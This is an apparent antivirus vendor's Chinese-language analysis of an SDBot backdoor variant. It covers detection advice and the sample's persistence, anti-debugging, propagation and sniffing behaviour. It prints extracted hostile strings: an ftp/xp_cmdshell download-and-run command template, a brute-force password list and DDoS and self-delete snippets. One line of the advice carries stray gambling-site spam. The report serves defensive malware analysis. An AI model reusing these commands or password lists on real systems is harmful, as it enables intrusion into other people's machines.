捕获时间
2009-1-28
病毒摘要
该样本是使用microsoft visual c 6.0编写的后门程序,由微点主动防御软件自动捕获,加winunpack壳后长度为53,528 字节,图标为“”,病毒扩展名为exe,主要通过“网页木马”、“文件捆绑”的方式传播,病毒主要作为被入侵系统的后门使用。
感染对象
windows 2000/windows xp/windows 2003
传播途径
网页木马,文件捆绑,系统和软件漏洞,系统共享
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
图1 微点主动防御软件自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"backdoor.win32.sdbot.aad.d”,请直接选择删除(如图2)。
图2 微点主动防御软件升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取yb亚博全站首页的技术支持。
3、开启windows自动更新,及时打好漏洞补丁。
病毒分析
该样本程序被执行后,动态获取所需的api,并调试环境检测,一旦检测到调试自杀后退出,没检测到继续,经过解密字符串后,检查自身是否已经运行,如果已经运行,则退出,否则拷贝自身到%systemroot%目录,然后设置文件时间与explorer.exe相同,并设置文件属性为系统加隐藏加只读,并设置派发服务函数,修改注册表与安装服务,成功后退出。
具体行为分析:
1.反调试手段:
(1) 利用"isdebuggerpresent"检测调试器
(2) 利用gettickout检查时间差检测是否被调试
(3) 通过检查注册表检测是否在虚拟机里运行:
ascii "software\vmware, inc.\vmware tools"
(4) 通过检查设备对象\\.\ntice检测softice
2. 是否已经运行检测:
通过检测自身路径判断是否第一次运行:
如果在%systemroot%,表示已经运行,直接退出,否则拷贝自身到此目录,名称为“msdvd.exe”。
3. 注册表操作:
注册表操作函数通过判断最后一个参数的值有不同的操作:
最后一个参数为1时,添加键值:
|
hkey = hkey_local_machine
subkey = "software\\microsoft\\windows\\currentversion\\shell extensions"
value = “c:\documents and settings\administrator\桌面\ msdvd.exe” |
|
4.创建服务:
|
servicename = "microsoftdvd"
displayname = "microsoftdvdhelp"
|starttype = service_auto_start
|binarypathname = """c:\windows\msdvd.exe""" |
|
5.派发服务函数主要功能:
是负责开线程,主要功能在线程函数里实现,功能如下:
(1) 设置%systemroot%\msdvd.exe 属性为正常,然后删除文件,连续删除3次
(2) 开启一个线程监控注册表,每600ms检测一次,发现被修改就改回来
|
subkey = software\microsoft\windows nt\currentversion\winlogon
key = shell |
|
(3) 新开启一个线程枚举网络共享
|
'd$\windows\system32',0 ;
'd$\winnt\system32',0 ;
'admin$\system32',0 ;
'admin$',0 |
|
(4) 释放名为rdriv.sys的驱动,并创建服务加载驱动,驱动用于保护病毒进程不被结束
(5) 通过设置注册表删除服务
|
subkey = system\\currentcontrolset\\control\
valuename = waittokillservicetimeout
value = 7000 |
|
(6) 开端口等待病毒作者连接,这个后门除了支持一般的文件,注册表操作外,还提供了irc后门功能,支持代理跳板扫描,各种ddos,更新服务端等很多自定义命令。
(7) 扫描局域网,利用lsass, ftpd, mssqlserver的各种已知漏洞溢出局域网其他主机,溢出成功后,上传自身并安装后门,还尝试暴力破解sql server的密码
|
echo quit >> o &ftp -n -s:o &del /f /q o &%s
exec master..xp_cmdshell ',27h,'del eq&echo open %s %d >> eq&echo us
user is running mirc %s, connected to %s (%s:%s) using the nic
' admin ',0 ;
' root ',0 ;
' server',0 ;
' asdf',0 ;
'administrator',0
'!@#$%^&',0 ;
'!@#$%^',0 ;
'!@#$%',0 ;
'!@#$',0 ;
'654321',0 ;
'123456',0 ;
'12345',0 ;
'1234',0 ;
'123',0 ;
'12',0 ;
'111',0 ;
'1',0 ; |
|
(8) 带有sniffer功能:嗅探各种密码
|
ftp sniff "%s:%d" to "%s:%d": - "%s"',0ah,0
'irc sniff "%s:%d" to "%s:%d": - "%s"',0
'bot sniff "%s:%d" to "%s:%d": - "%s"
pop3 password2',0
'pop3 server',0
'pop3 user name',0
'httpmail password2',0
'hotmail',0 |
|
(9) 从注册表读区浏览器保存的密码:
|
software\microsoft\internet account manager\accounts
ie auto-complete:
ie password protected: |
|
(10) 带有ddos功能:
|
'ackflood',0
'icmpflood',0
'phatwonk',0
'synflood',0
'udpflood' |
|
(11) 自删除:
|
'@echo off',0dh,0ah ;
':repeat',0dh,0ah
'del "%s">nul',0dh,0ah
'if exist "%s" goto repeat',0dh,0ah
'del "%%0"' |
|